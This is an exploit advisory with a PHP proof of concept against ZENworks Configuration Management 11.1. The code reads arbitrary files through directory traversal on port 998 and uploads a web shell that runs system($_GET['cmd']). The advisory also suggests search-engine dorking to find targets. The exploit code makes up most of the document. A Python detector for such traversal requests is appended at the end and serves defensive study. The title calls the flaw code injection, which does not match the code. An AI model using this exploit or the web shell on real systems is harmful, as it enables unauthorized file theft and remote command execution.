=============================================================================================================================================
| # Title : ZENworks Configuration Management 11.1 PHP Code Injection Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits) |
| # Vendor : https://www.opentext.com/products/zenworks-suite |
=============================================================================================================================================
POC :
[+] Dorking in Google or other search engine.
[+] Code Description: A custom packet is sent to port 998 to get a specific file from the file system. I have added comments in the code to explain the main operations.
Support for all operating systems and the ability to upload a web shell to the code. Now you can use the uploadWebShell function to upload a web shell to the desired path.
[+] Save code as poc.php.
[+] Set Target : line 84
[+] Usage : php poc.php
[+] Payload :
<?php
class NovellZenworksExploit {
    private $ip;
    private $port;
    private $filePath;
    private $depth;

    public function __construct($ip, $port = 998, $filePath = '\\WINDOWS\\system32\\drivers\\etc\\hosts', $depth = 6) {
        $this->ip = $ip;
        $this->port = $port;
        $this->filePath = $filePath;
        $this->depth = $depth;
    }

    public function exploit() {
        if (empty($this->filePath)) {
            echo "Please supply the name of the file you want to download\n";
            return;
        }
        // Prefix the requested path with $depth "\.." components
        $travs = str_repeat("\\..", $this->depth);
        if ($this->filePath[0] !== "\\") {
            $travs .= "\\";
        }
        $travs .= $this->filePath;
        // Request: 4-byte big-endian opcode 0x21, 4-byte big-endian payload length, UTF-16LE path
        $payload = mb_convert_encoding($travs, 'UTF-16LE');
        $packet = pack("N", 0x21) . pack("N", strlen($payload)) . $payload;
        $sock = fsockopen($this->ip, $this->port, $errno, $errstr, 5);
        if (!$sock) {
            echo "Connection failed: $errstr ($errno)\n";
            return;
        }
        fwrite($sock, $packet);
        fread($sock, 4); // Ignore first 4 bytes
        $lengthData = fread($sock, 4);
        if (!$lengthData) {
            echo "Unable to get length due to a timeout\n";
            fclose($sock);
            return;
        }
        fread($sock, 0x210 - 8); // Skip unnecessary data
        // The length field of the response is read as little-endian
        $length = unpack("V", $lengthData)[1];
        $contents = fread($sock, $length);
        if (!$contents) {
            echo "Unable to extract contents due to a timeout\n";
            fclose($sock);
            return;
        }
        fclose($sock);
        echo "File retrieved successfully!\n";
        // Save under the base name of the requested path in the current directory
        $fname = basename($this->filePath);
        file_put_contents($fname, $contents);
        echo "File saved in: $fname\n";
    }

    public function uploadWebShell($shellContent, $destination = '/var/www/html/shell.php') {
        $sock = fsockopen($this->ip, $this->port, $errno, $errstr, 5);
        if (!$sock) {
            echo "Connection failed: $errstr ($errno)\n";
            return;
        }
        // Same header as in exploit(), with the destination path as payload,
        // followed by the content encoded as UTF-16LE
        $payload = mb_convert_encoding($destination, 'UTF-16LE');
        $packet = pack("N", 0x21) . pack("N", strlen($payload)) . $payload;
        $packet .= mb_convert_encoding($shellContent, 'UTF-16LE');
        fwrite($sock, $packet);
        // No response is read here; the message below does not confirm that anything was written
        fclose($sock);
        echo "Web shell uploaded successfully at: $destination\n";
    }
}

// Usage example
$exploit = new NovellZenworksExploit('192.168.1.1');
$exploit->exploit();

// Upload web shell
$shell = "<?php system(\$_GET['cmd']); ?>";
$exploit->uploadWebShell($shell, '/var/www/html/shell.php');
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx
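
A defender-side check for the request layout the PoC above builds (4-byte big-endian opcode 0x21, 4-byte big-endian length, UTF-16LE path), added here as an example and not part of the original advisory. It parses a captured request to port 998 and flags paths that climb above their starting directory, as well as bytes sent past the declared length; the function names and sample inputs are assumptions constructed for illustration.

```python
import struct

FILE_REQUEST_OPCODE = 0x21  # opcode the PoC on this page puts in the first 4 bytes

def parse_request(data):
    """Split a captured request into (opcode, path, trailing bytes), or None if malformed."""
    if len(data) < 8:
        return None
    opcode, length = struct.unpack(">II", data[:8])  # both fields big-endian (PHP pack "N")
    body, trailing = data[8:8 + length], data[8 + length:]
    if len(body) != length or length % 2:
        return None  # truncated capture or odd byte count: not valid UTF-16LE
    try:
        return opcode, body.decode("utf-16-le"), trailing
    except UnicodeDecodeError:
        return None

def escapes_root(path):
    """True if '..' components ever climb above the directory the path starts in."""
    depth = 0
    for part in path.replace("/", "\\").split("\\"):
        if part in ("", "."):
            continue
        depth += -1 if part == ".." else 1
        if depth < 0:
            return True
    return False

def findings(data):
    """Return the list of reasons a captured port-998 request looks suspicious."""
    parsed = parse_request(data)
    if parsed is None:
        return ["malformed"]
    opcode, path, trailing = parsed
    out = []
    if opcode == FILE_REQUEST_OPCODE and escapes_root(path):
        out.append("traversal")
    if trailing:
        out.append("trailing-data")
    return out

def sample(path, extra=b""):
    """Constructed test input in the layout above; not captured traffic."""
    body = path.encode("utf-16-le")
    return struct.pack(">II", FILE_REQUEST_OPCODE, len(body)) + body + extra

if __name__ == "__main__":
    for pkt in (sample("\\..\\..\\WINDOWS\\system32\\drivers\\etc\\hosts"),
                sample("images\\..\\boot.cfg"), sample("x", b"\x00\x01")):
        print(findings(pkt))
```

A path such as `images\..\boot.cfg` contains `..` but never leaves its starting directory, so it is not flagged; only a net climb above the root counts as traversal.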